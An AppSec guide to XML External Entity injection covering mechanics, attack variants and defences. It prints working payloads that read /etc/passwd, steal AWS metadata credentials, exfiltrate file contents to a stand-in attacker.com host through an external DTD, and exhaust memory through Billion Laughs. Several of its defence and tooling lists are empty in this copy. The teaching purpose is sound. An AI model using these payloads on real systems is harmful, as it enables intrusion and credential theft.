appsec.fyi

XXE — A Practical Guide

A curated AppSec resource library covering XSS, SQLi, SSRF, IDOR, RCE, XXE, OSINT, and more.

XXE: A Practical Guide

Curated and synthesized by . Last updated 2026-06-29. Synthesized from 86 of 86 curated resources. Browse all 86 XXE resources →

The Persistent Threat of XML External Entity (XXE) Injection

XML External Entity (XXE) injection remains a significant threat to application security, despite its long-standing presence in vulnerability landscapes. Its persistence is largely due to the inherent design of XML parsers and the complex, often overlooked, configurations required for secure processing. This guide aims to provide a deep dive into XXE for experienced application security professionals, covering its mechanics, exploitation techniques, detection, and mitigation strategies.

Core Mechanics of XXE

At its heart, XXE injection exploits how XML parsers process external entities. XML allows for the definition of entities, which are essentially placeholders for content that can be fetched from various sources, including local files and remote URLs. When an XML parser encounters an external entity declaration and is configured to resolve it, it dereferences the specified URI, potentially embedding the retrieved content into the XML document.

The core vulnerability arises when an application accepts untrusted XML input and its XML parser is not configured to disable or restrict the processing of external entities and Document Type Definitions (DTDs). This allows an attacker to craft malicious XML payloads that reference external resources, thereby forcing the vulnerable application to fetch and process content that should remain inaccessible.

The XML specification defines entities that can access local or remote content via a system identifier [1][2]. An external entity can be defined within the XML document itself or, more commonly, via an external DTD. When an XML processor encounters such an entity, it resolves the system identifier. If this identifier points to a local file (e.g., file:///etc/passwd), the parser might include the file's contents in the XML output [3][4]. Similarly, it can reference URLs, leading to Server-Side Request Forgery (SSRF) [5][6].

The critical issue often stems from the default configurations of XML parsers in various programming languages and libraries, which may have features like DTD loading and external entity resolution enabled by default [7][8].

Notable Techniques and Attack Vectors

XXE attacks manifest in several forms, each with distinct impacts:

File Disclosure

This is the most straightforward XXE attack, where an attacker crafts an XML payload that references a local file. The parser then fetches the file's content and, if the application reflects this parsed content back to the user, the attacker gains direct access to sensitive information.

<?xml version="1.0" encoding="ISO-8859-1"?>

<!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >] > <foo>&xxe;</foo>

This payload aims to read the /etc/passwd file, a common target for demonstrating file disclosure [5][4][1]. Attackers often target configuration files, credentials, or system-sensitive files.

Server-Side Request Forgery (SSRF)

XXE can be weaponized to force the vulnerable server to make arbitrary HTTP requests to internal or external resources. This allows attackers to probe internal networks, interact with internal APIs, or access cloud metadata endpoints.

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE data [ <!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]> <data>&ssrf;</data>

This example targets the AWS EC2 metadata service, a common SSRF vector to steal cloud credentials [5][9][10].

Blind XXE and Out-of-Band (OOB) Exfiltration

In blind XXE scenarios, the application may be vulnerable, but it doesn't directly reflect the entity's content in the response. Attackers use out-of-band techniques to exfiltrate data. This typically involves leveraging external DTDs hosted on an attacker-controlled server to trigger HTTP requests or DNS lookups containing the sensitive data.

An attacker can host a malicious DTD file (e.g., evil.dtd) on their server:

<!ENTITY % file SYSTEM "file:///etc/hostname">

<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>"> %eval; %exfiltrate;

The main XML payload would then reference this DTD:

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe; ]> <data>&xxe;</data>

The contents of /etc/hostname are then sent to attacker.com via an HTTP request [11][12][13][14].

Error-Based XXE

Similar to blind XXE, this technique involves triggering XML parsing errors that inadvertently reveal sensitive data. The attacker crafts a payload that attempts to access a non-existent resource using file contents, causing the error message to include the sensitive data.

A malicious DTD might contain:

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error;

When processed, an error like FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bash can occur, revealing file contents [13][15].

Resource Exhaustion (Denial of Service)

The "Billion Laughs" attack exploits recursive entity expansion to consume excessive memory and processing power, potentially leading to a Denial of Service (DoS) [5][4][2].

<!DOCTYPE lolz [

<!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]> <lolz>&lol3;</lolz>

Exploiting File Uploads (SVG, DOCX, XLSX)

Many file formats, such as SVG, DOCX, XLSX, and ODT, are XML-based or contain XML components. Applications that process these files for content extraction or rendering can be vulnerable to XXE if the XML parser is not secured [16][7][17][18][19].

For example, a malicious SVG file can contain an XXE payload to reveal file contents when rendered:

<?xml version="1.0" standalone="yes"?>

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"> <text font-size="16" x="0" y="16">&xxe;</text> </svg>

When processed, the hostname might be displayed within the SVG image itself [5][20][6]. Tools like Docem and oxml_xxe automate the embedding of XXE payloads into these document formats [21][22][23][24][19].

Exploiting Protocols and Wrappers

Depending on the underlying XML parser and language runtime (e.g., Java, PHP), attackers can leverage various protocols beyond file:// and http://. PHP's php://filter wrapper, for instance, can be used to encode file contents (e.g., Base64) to bypass character restrictions or to read PHP source code [25][26][27][28][29]. Older Java versions might support protocols like gopher://, ldap://, jar://, allowing for more diverse interactions [30][31][32].

The expect:// wrapper in PHP can be particularly dangerous, allowing for remote command execution if available on the server [25][26][27][14].

Detection and Prevention

Preventing XXE vulnerabilities hinges on securely configuring XML parsers and sanitizing input. The most effective methods involve disabling features that enable external entity processing.

Secure XML Parsing Configuration

The primary defense is to disable the processing of DTDs and external entities altogether. Most modern XML parsers offer features to achieve this:

It is crucial to apply these configurations consistently across all XML parsing operations, especially when dealing with untrusted input [4][1].

Input Validation and Sanitization

While not a foolproof primary defense against XXE (as the core issue lies in parser configuration), input validation can act as a supplementary layer. This involves:

Relying solely on input validation or sanitization to prevent XXE is inadvisable [34].

Web Application Firewalls (WAFs)

WAFs can provide an additional layer of defense by detecting and blocking known XXE patterns in traffic. However, WAFs are susceptible to bypass techniques and should not be considered the primary security control [2].

Dependency Management

Regularly updating XML parsing libraries and frameworks is essential, as vulnerabilities are often patched in newer versions. Failing to manage dependencies can leave applications exposed to known XXE flaws in older, vulnerable libraries [7][17].

Tooling for XXE Analysis

Several tools can assist in discovering and exploiting XXE vulnerabilities:

Recent Developments and Trends

XXE continues to be a prevalent vulnerability, with new instances discovered regularly in various software products:

The trend shows that attackers continue to find and exploit XXE, often by chaining it with other vulnerabilities or using sophisticated bypass techniques.

Where to Go Deeper

For those wishing to expand their knowledge and practical skills in XXE exploitation, the following resources are highly recommended:

Sources cited in this guide

  1. XML External Entity (XXE) Processing | OWASP — owasp.org
  2. XXE Complete Guide: Impact, Examples, and Prevention — hackerone.com
  3. XXE Injection in langchain-community (CVE-2025-6984) — security.snyk.io
  4. XML External Entity - GeeksforGeeks — geeksforgeeks.org
  5. XXE Vulnerability Guide 2025: How XML Attacks Still Threaten — instatunnel.my
  6. XML External Entity (XXE) Attack Guide | Hackviser — hackviser.com
  7. XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack — yeswehack.com
  8. XML External Entity Prevention · OWASP Cheat Sheet Series — cheatsheetseries.owasp.org
  9. Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles — medium.com
  10. 11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023 — cyberw1ng.medium.com
  11. Exploiting Blind XXE: Data Exfiltration Through External DTD — medium.com
  12. Blind XXE: Exfiltrating Data Out-of-Band in 2025 — instatunnel.my
  13. What is a Blind XXE Attack? | PortSwigger — portswigger.net
  14. XXExploiter — github.com
  15. From blind XXE to root-level file read access – Honoki — honoki.net
  16. Exploiting XXE via File Uploads (SVG, XLSX, DOCX) — exploit-db.com
  17. 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs — labs.detectify.com
  18. XXE attacks 😈 — link.medium.com
  19. BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different — github.com
  20. PortSwigger XXE Injection Writeups — g4nd1v.github.io
  21. XXElixir: Tool for Testing XXE via XLSX File Upload Poisoning — github.com
  22. https://www.hahwul.com/2019/09/28/oxml-xxe-payload-inject-tool-docem/ — hahwul.com
  23. GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) — github.com
  24. If you find powerful OXML XXE tool? it’s “DOCEM” — hahwul.com
  25. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  26. Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE — github.com
  27. Comprehensive Guide to XXE Exploitation: Advanced Data Exfiltration and RCE — nullsecurityx.codes
  28. XXE - XEE - XML External Entity - HackTricks — book.hacktricks.xyz
  29. https://portswigger.net/web-security/xxe — portswigger.net
  30. XXE - Things Are Getting Out of Band — blog.zsec.uk
  31. https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ — hackingarticles.in
  32. XXE - Things Are Getting Out of Band — blog.zsec.uk
  33. CVE-2025-27136: LocalS3 CreateBucketConfiguration XXE Injection — offsec.com
  34. Out-of-Band XML External Entity (OOB XXE) — invicti.com
  35. https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html — noob.ninja
  36. Critical Apache Tika Vulnerability Leads to XXE Injection — securityweek.com
  37. CVE-2025-66516: Detecting and Defending Against Apache Tika XXE — akamai.com
  38. Critical Apache Tika CVE-2025-66516: XXE Vulnerability — rescana.com
  39. CVE-2025-30220: GeoServer WFS Service XML External Entity — miggo.io
  40. XXE in GeoServer WFS Service (CVE-2025-30220) — kudelskisecurity.com
  41. Cisco ISE XXE Information Disclosure — sec.cloudapps.cisco.com
  42. CVE-2025-54254: Adobe Experience Manager Forms XXE Vulnerability — sentinelone.com
  43. Rapid7 Analysis: CVE-2022-28219 — rapid7.com
  44. IBM Business Automation Workflow XXE (CVE-2025-13096) — ibm.com
  45. CVE-2025-49493: XXE in Akamai CloudTest — xbow.com
  46. CVE-2025-11035: Jinher OA XXE Vulnerability — sentinelone.com
  47. Pre-auth XXE → HTTP SSRF on ArubaOS 8.13.2 closed as "theoretical / no valid PoC" despite TCP pcap, sshd localhost log, and internal port scan — documenting for community review — netacoding.com
  48. Top HackerOne XXE Reports — github.com
  49. Top 25 XXE Bug Bounty Reports — corneacristian.medium.com
  50. Blind XXE Attacks: Out of Band Interaction Techniques to Exfiltrate Data — shreyapohekar.com
  51. XXE Injection: Advanced Exploitation Guide — intigriti.com
  52. https://gosecure.github.io/xxe-workshop/#0 — gosecure.github.io
📚 This guide is synthesized from the full text of resources curated in the XXE library, and refreshed as new material is added.